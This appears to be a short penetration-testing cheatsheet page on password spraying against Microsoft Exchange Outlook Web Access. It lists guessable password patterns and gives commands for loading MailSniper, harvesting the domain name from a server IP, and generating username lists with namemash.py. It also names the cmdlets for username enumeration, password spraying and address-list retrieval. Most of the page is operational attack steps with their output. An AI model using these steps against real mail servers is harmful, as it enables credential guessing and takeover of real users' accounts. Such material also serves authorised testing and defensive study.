Password Spraying
Common pattern:
MonthYear (September2021)
SeasonYear (Spring2021)
DayDate (Wednesday1)
Cheatsheet
Using ipmo to import the .ps1 script
PS C:\> ipmo C:\Tools\MailSniper\MailSniper.ps1Enumerate the NetBIOS name with Invoke-DomainHarvestOWA
PS C:\> Invoke-DomainHarvestOWA -ExchHostname 10.10.15.100
[*] Harvesting domain name from the server at 10.10.15.100
The domain appears to be: CYBER or cyberbotic.ioGenerate potential usernames using namemash.py
root@kali:~# /opt/namemash.py names.txt >> possible-usernames.txt
root@kali:~# head -n 5 possible-usernames.txt
bobfarmer
farmerbob
bob.farmer
farmer.bob
farmerbEnumerating usernames using Invoke-UsernameHarvestOWA
Password spraying using Invoke-PasswordSprayOWA
Retrieving the Global Address List (GAL) using Get-GlobalAddressList
Tools
MailSniper - Searching email in Microsoft Exchange, enumerating users and domains, gathering Global Address List (GAL) from OWA and EWS...
namemash.py - Creating a user name list for brute force attacks.
SprayingToolkit - Password spraying attacks against Lync/S4B, OWA & O365
Last updated
Was this helpful?